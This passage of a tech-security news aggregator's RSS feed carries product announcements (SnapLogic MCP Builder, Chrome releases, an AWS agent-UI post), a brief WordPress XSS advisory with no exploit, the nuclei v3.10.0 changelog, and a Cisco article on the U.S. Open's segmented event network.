<description><![CDATA[SnapLogic has released MCP Builder, a template-based tool designed to help organizations operationalize AI faster by turning existing integration pipelines into agent-ready Model Context Protocol (MCP) servers.



Announced July 1 and generally available in the MCP Server workflow of the SnapLogi...]]></description>
<link>https://tsecurity.de/de/3639896/ai-nachrichten/snaplogic-mcp-builder-eases-creation-of-mcp-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639896/ai-nachrichten/snaplogic-mcp-builder-eases-creation-of-mcp-servers/</guid>
<pubDate>Thu, 02 Jul 2026 01:18:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>SnapLogic has released MCP Builder, a template-based tool designed to help organizations operationalize AI faster by turning existing integration pipelines into agent-ready <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers.</p>



<p>Announced July 1 and generally available in the <a href="https://www.snaplogic.com/products/mcp">MCP Server</a> workflow of the SnapLogic platform, MCP Builder generates MCP servers from existing integrations, OpenAPI specifications, and API management services, SnapLogic said. Organizations can publish MCP tools without rebuilding workflows, writing code, or manually constructing MCP implementations, resulting in faster deployment and greater consistency, according to the company. </p>



<p>SnapLogic said MCP Builder makes it easier to create MCP Servers, connecting AI agents to trusted enterprise systems and workflows. Unlike DIY MCP approaches, SnapLogic accelerates MCP adoption by turning existing deterministic pipelines into governed MCP tools through a one-step creation experience, while providing enterprise connectivity, identity propagation, observability, and life-cycle governance through the unified SnapLogic Agentic Integration Platform.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.3) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3639180/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639180/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Wed, 01 Jul 2026 18:37:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.3) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.52..151.0.7922.3?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11570 | User Submitted Posts Plugin 20240516 on WordPress Display Page Template cross site scripting (ID 20260608 / EUVD-2026-40917)]]></title>
<description><![CDATA[A vulnerability was found in User Submitted Posts Plugin 20240516 on WordPress and classified as problematic. The affected element is an unknown function of the component Display Page Template Handler. The manipulation results in cross site scripting.

This vulnerability is cataloged as CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3638305/sicherheitsluecken/cve-2026-11570-user-submitted-posts-plugin-20240516-on-wordpress-display-page-template-cross-site-scripting-id-20260608-euvd-2026-40917/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638305/sicherheitsluecken/cve-2026-11570-user-submitted-posts-plugin-20240516-on-wordpress-display-page-template-cross-site-scripting-id-20260608-euvd-2026-40917/</guid>
<pubDate>Wed, 01 Jul 2026 13:26:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/user_submitted_posts_plugin">User Submitted Posts Plugin 20240516</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function of the component <em>Display Page Template Handler</em>. The manipulation results in cross site scripting.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-11570">CVE-2026-11570</a>. The attack may be launched remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[ Hi, everyone! We've just released Chrome 150 (150.0.7871.63) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know...]]></description>
<link>https://tsecurity.de/de/3637048/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637048/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Wed, 01 Jul 2026 01:08:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> Hi, everyone! We've just released <b>Chrome 150 (150.0.7871.63)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.197..150.0.7871.63?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0175352312.html"> Desktop releases</a> (Windows &amp; Mac: 150.0.7871.46/47, Linux: 150.0.7871.46) unless otherwise noted.</div><div><div><br></div><div><div>Krishna Govind</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build generative UI for AI agents on Amazon Bedrock AgentCore with the AG-UI protocol]]></title>
<description><![CDATA[This post walks through how AG-UI integrates into the Fullstack AgentCore Solution Template (FAST) to build interactive agent frontends on Amazon Bedrock AgentCore. We then show how CopilotKit extends this with generative UI, shared state, and human-in-the-loop interactions, all deployed on Amazo...]]></description>
<link>https://tsecurity.de/de/3636323/ai-nachrichten/build-generative-ui-for-ai-agents-on-amazon-bedrock-agentcore-with-the-ag-ui-protocol/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636323/ai-nachrichten/build-generative-ui-for-ai-agents-on-amazon-bedrock-agentcore-with-the-ag-ui-protocol/</guid>
<pubDate>Tue, 30 Jun 2026 18:47:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This post walks through how AG-UI integrates into the Fullstack AgentCore Solution Template (FAST) to build interactive agent frontends on Amazon Bedrock AgentCore. We then show how CopilotKit extends this with generative UI, shared state, and human-in-the-loop interactions, all deployed on Amazon Bedrock AgentCore.]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.10.0]]></title>
<description><![CDATA[What's Changed
🎉 New Features

Added per-host HTTP client pooling by @Mzack9999 in #7301

🐞 Bug Fixes

Fixed handling in hosterrorscache to automatically skip hosts that consistently time out by @knakul853 in #7455
Fixed preservation of explicit target port in network templates (fixes #7323) by @...]]></description>
<link>https://tsecurity.de/de/3635430/it-security-tools/v3100/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635430/it-security-tools/v3100/</guid>
<pubDate>Tue, 30 Jun 2026 13:33:11 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<h3>🎉 New Features</h3>
<ul>
<li>Added per-host HTTP client pooling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136122067" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7301" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7301/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7301">#7301</a></li>
</ul>
<h3>🐞 Bug Fixes</h3>
<ul>
<li>Fixed handling in hosterrorscache to automatically skip hosts that consistently time out by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625642707" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7455" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7455/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7455">#7455</a></li>
<li>Fixed preservation of explicit target port in network templates (fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193434012" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7323" data-hovercard-type="issue" data-hovercard-url="/projectdiscovery/nuclei/issues/7323/hovercard" href="https://github.com/projectdiscovery/nuclei/issues/7323">#7323</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XananasX7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XananasX7">@XananasX7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4674940669" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7465" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7465/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7465">#7465</a></li>
<li>Fixed connection reuse and improved port pre-flight handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3742629949" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6715" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6715/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6715">#6715</a></li>
<li>Fixed code template signature validation before DAST loading by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4700411528" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7472" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7472/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7472">#7472</a></li>
<li>Fixed gating of MySQL allowAllFiles option to require <code>-lfa</code> flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4700411763" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7473" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7473/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7473">#7473</a></li>
<li>Fixed ASCII-section regex to properly escape literal <code>.</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snicket2100/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snicket2100">@snicket2100</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702795464" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7476/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7476">#7476</a></li>
<li>Fixed recording of decoded bytes for debug dumps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snicket2100/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snicket2100">@snicket2100</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702868000" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7478" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7478/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7478">#7478</a></li>
<li>Fixed proper escaping of dbname in lib/pq URLs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707305002" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7479" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7479/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7479">#7479</a></li>
<li>Fixed network policy enforcement prior to LDAP dialing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716406586" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7494" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7494/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7494">#7494</a></li>
<li>Fixed normalization and rejection of trace file DSN options in Oracle by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707423201" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7480" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7480/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7480">#7480</a></li>
<li>Fixed proper escaping of MSSQL database names in connection URLs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707534902" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7481" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7481/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7481">#7481</a></li>
<li>Fixed krbforge to reject unsandboxed ccache writes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4708196803" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7482" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7482/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7482">#7482</a></li>
<li>Fixed rejection of request-condition(s) during fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676212647" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7466" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7466/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7466">#7466</a></li>
<li>Fixed: YAML now correctly rejects recursive include chains by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715165100" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7492" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7492/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7492">#7492</a></li>
<li>Fixed resource leaks by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4739223018" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7502" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7502/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7502">#7502</a></li>
</ul>
<h3>Other Changes</h3>
<ul>
<li>Updated govaluate dependency to prevent slice-bounds panic on invalid UTF-8 input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XananasX7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XananasX7">@XananasX7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664829426" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7464" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7464/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7464">#7464</a></li>
<li>Updated goja dependency by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692928412" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7467" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7467/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7467">#7467</a></li>
<li>Updated dependencies to remove unused packages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4626903870" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7457" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7457/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7457">#7457</a></li>
<li>Refactored templates to centralize opt-in capability gating by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4711432414" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7489" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7489/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7489">#7489</a></li>
<li>Added fuzzing parser harnesses for raw requests and templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4628070192" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7459" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7459/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7459">#7459</a></li>
<li>Refactored template rendering boundary by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729885007" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7499" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7499/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7499">#7499</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XananasX7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XananasX7">@XananasX7</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4674940669" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7465" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7465/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7465">#7465</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snicket2100/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snicket2100">@snicket2100</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702795464" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7476/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7476">#7476</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/projectdiscovery/nuclei/compare/v3.9.0...v3.10.0"><tt>v3.9.0...v3.10.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. Open powers up AI-ready network in challenging environment]]></title>
<description><![CDATA[Cisco’s work with the USGA at the 2026 U.S. Open at Shinnecock Hills Golf Club was a live testbed for what AI-ready networking and security look like in the wild — not in a lab, not in a climate-controlled data center, but across 18 holes of constantly changing terrain, crowds, and threats. It’s ...]]></description>
<link>https://tsecurity.de/de/3634437/it-security-nachrichten/us-open-powers-up-ai-ready-network-in-challenging-environment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634437/it-security-nachrichten/us-open-powers-up-ai-ready-network-in-challenging-environment/</guid>
<pubDate>Tue, 30 Jun 2026 05:19:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Cisco’s work with the <a href="https://www.usga.org/">USGA</a> at the 2026 U.S. Open at <a href="https://www.shinnecockhillsgolfclub.org/">Shinnecock Hills Golf Club</a> was a live testbed for what AI-ready networking and security look like in the wild — not in a lab, not in a climate-controlled data center, but across 18 holes of constantly changing terrain, crowds, and threats. It’s also a blueprint that network engineers in other industries can borrow as they grapple with the convergence of connectivity, security, and AI apps.</p>



<h2 class="wp-block-heading">Golf as a worst‑case network environment</h2>



<p>From a distance, it’s tempting to lump golf in with stadium or arena networking. The reality on the ground is very different. Stadiums offer a fixed concrete bowl and predictable RF patterns. A <a href="https://www.usopen.com/">U.S. Open</a> venue is effectively rebuilt every year: temporary structures, new hospitality layouts, shifting fiber routes, and a crowd that never sits still.</p>



<p>Christian Rodriguez, senior manager, IT operations, from the USGA’s technology team, captured that reality when he explained why they tear down and rebuild from scratch: No two championships share the same layout, ISP entry points, or even the placement of critical compounds. They don’t simply clone last year’s configs; they design for the specific course, topology, and constraints of that site. That level of contextual design is expensive, but it’s also the only way to avoid brittle architectures that fall apart as soon as the environment changes.</p>



<p>Environmental conditions add another layer of complexity. Anthony Santora, managing director of IT for the USGA, describes the championship network as a data center without the usual comforts. There’s dust, rain, wind, and wide temperature swings instead of clean, controlled air. Hardware resides in trailers and weatherproof enclosures, not in racks behind raised floor tiles. For network engineers who spend most of their time on office campuses and in colos, that’s an important reminder: Critical infrastructure increasingly sits in places that look nothing like a traditional wiring closet.</p>



<p>User behavior is just as hostile. The U.S. Open has its own term — the “Tiger effect” (though one could argue it’s now the Scottie effect) — for what happens when tens of thousands of fans follow a single golfer. The hot spot moves with the group, and the RF design must cope with a dense, moving cluster of devices. That pattern should sound familiar to anyone who supports large conferences or festivals; it’s the same phenomenon, just under a different name.</p>



<h2 class="wp-block-heading">Building an AI‑ready, fault‑tolerant course network</h2>



<p>Cisco’s answer to this environment is a fully redundant, mobile core design. Instead of a single large core in a building, the network collapses into dual trailers that serve as cores on the go, typically anchored at the NBC broadcast compound and another central location. Each core hosts Cisco Secure Firewall appliances, FMCs, core Catalyst switches, DHCP, UPS, and generators, all in pairs. Rodriguez was matter-of-fact about the philosophy: “We do everything in pairs as much as we can.” If one fails, its twin picks up the load.</p>



<p>From those cores, the team builds a ring topology around the course, using diverse fiber paths — including trenching fiber through wooded areas — to avoid single points of failure. Mobile IDF kits in cooled cabinets serve as distribution points, delivering connectivity to weatherproof access switches and Wi-Fi access points around hospitality tents, grandstands, and entry gates. Everything on the backbone operates at Layer 3, with HSRP (Hot Standby Routing Protocol) and routing redundancy to ensure that a single switch failure doesn’t take out large swaths of the network.</p>



<p>The scale of a golf course deployment is massive as well, with about 500 access points and more than 100 switches, many of them the latest <a href="https://www.networkworld.com/article/4135351/favorable-wi-fi-7-prices-wont-be-around-for-long-delloro-group-warns.html">Wi‑Fi 7</a> and campus platforms. What matters is not the absolute numbers but the duty cycle. Every TV, every POS terminal, every credential pedestal, every media workstation, and every fan device share this converged fabric during a compressed, high‑risk period. Santora points out the business impact in simple terms: If merchandise goes down for even five minutes, lines explode and fans walk away. There’s no “we’ll patch it on the next maintenance window.”</p>



<p>On the RF side, the <a href="https://www.networkworld.com/article/4092389/singapore-makes-the-leap-to-wi-fi-7-to-boost-fan-experience.html">shift to Wi‑Fi 7</a> is more than a speed upgrade. Santora’s team has seen real-world performance improvements — hundreds of megabits down in the middle of a packed media center – but the more important change is resilience under high density. When you combine wider channels, better scheduling, and smarter management with a dense deployment, you get something that can withstand the Tiger Effect and the crush of content creators and broadcasters.</p>



<p>That last group is critical. Rob Neumann from Cisco notes that at these events, upload traffic now dominates download traffic. Influencers, media teams, and fans are publishing in near-real time, and cellular uplink simply can’t keep up. High-capacity Wi-Fi with solid backhaul isn’t a luxury; it’s the only way to avoid a miserable experience for the most vocal, visible part of the audience.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="894" height="1024" sizes="auto, (max-width: 894px) 100vw, 894px"&gt;</figure><p class="imageCredit">Zeus Kerravala</p></div>



<h2 class="wp-block-heading">Security: Treat every device as untrusted</h2>



<p>If the connectivity story feels familiar, the security posture at the U.S. Open is where this deployment begins to diverge from more generic “converged stadium” narratives. Santora has to contend with “thousands of untrusted devices” each championship week: fans, vendors, media, broadcasters, and staff, many of whom plug in or connect to networks the USGA doesn’t control outside the event. The USGA is well aware of the risks: outages or breaches could lead to data and financial losses, as well as reputational damage that would undermine the organization’s core mission, not just its IT metrics.</p>



<p>Cisco Secure Firewall, AnyConnect, Duo, and other components form the core security stack, but how they’re used is the differentiator. Fan Wi‑Fi runs with strict isolation: every client is segmented, so lateral movement is essentially off the table. Neumann explains it simply — each fan has an isolated path out — but under the covers, you get VLAN separation, policy enforcement, and inspection that treat fan traffic as untrusted end-to-end.</p>



<p>The rest of the network is equally segmented. There’s a separate network for <a href="https://www.pgatour.com/shotlink">ShotLink</a> and everything “inside the ropes,” including scoring and betting feeds. Back-of-house traffic for staff, concessions, and retail runs on its own network. Remote POS systems are segmented again. Broadcast compounds and production systems have their own paths and policies. The result is a unified, converged physical fabric with tightly controlled logical overlays.</p>



<p>This is a pattern many enterprises discuss but struggle to implement: a single platform that carries many classes of traffic, each with its own risk profile, without collapsing into a flat, lateral-friendly network. The U.S. Open shows that it’s possible — but only if segmentation is treated as a core design principle, not an afterthought.</p>



<h2 class="wp-block-heading">Observability and AI security in the loop</h2>



<p>Security and availability at this scale demand observability. Here again, Santora’s team is in the middle of a transition many enterprises are grappling with: moving from reactive log-scraping to proactive, correlated telemetry.</p>



<p>Instead of manually combing through firewall and switch logs, the USGA and Cisco have built a pipeline into Splunk and Cisco’s observability tools. Neumann describes it as a single pane of glass across the network, but the more important point is what feeds that view: APs, switches, firewalls, cameras, and applications, all instrumented and reporting. When you combine that with full-stack observability, you can spot anomalies in real time, whether they’re performance issues or indicators of compromise.</p>



